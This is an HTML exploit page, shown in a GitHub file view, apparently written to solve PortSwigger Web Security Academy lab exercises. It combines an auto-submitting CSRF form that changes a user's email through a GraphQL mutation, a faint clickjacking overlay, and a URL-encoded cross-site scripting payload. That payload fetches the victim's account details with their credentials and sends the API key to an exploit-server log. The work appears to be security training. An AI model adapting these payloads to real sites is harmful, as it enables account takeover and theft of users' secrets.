-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
47 lines (42 loc) · 1.47 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!DOCTYPE html>
<html lang="en">
<style>
body {
position: relative;
}
#vic {
width: 500px;
height: 700px;
z-index: 2;
opacity: 0.1;
position: absolute;
}
#div1 {
z-index: 1;
position: absolute;
top: 490px;
left: 40px;
}
#div2 {
z-index: 1;
position: absolute;
top: 285px;
left: 200px;
}
</style>
<body>
<meta name="referrer" content="never">
<form method="POST"
action="https://0aa600fa042f042b832e460c00050027.web-security-academy.net/graphql/v1">
<input type="hidden" name="query" value="mutation changeEmail($input: ChangeEmailInput!) { changeEmail(input: $input) { email } }">
<input type="hidden" name="operationName" value="changeEmail" />
<input type="hideen" name="variables" value='{"input":{"email":"[email protected]"}}' />
</form>
<script>
document.forms[0].submit();
</script>
<script>
document.location = "https://stock.0a22009104211e5a80c844d600a3000c.web-security-academy.net/?productId=3%3Cscript%3Efetch(%27https://0a22009104211e5a80c844d600a3000c.web-security-academy.net/accountDetails%27,%20{%20credentials:%20%27include%27%20}).then(r%20=%3E%20r.json()).then(j%20=%3E%20{%20document.location%20=%20%22https://exploit-0a2b0010040d1e598057439701bd0016.exploit-server.net/log?key=%22%20+%20%2Bj.apikey;%20})%3C/script%3E&storeId=1"
</script>
</body>
</html>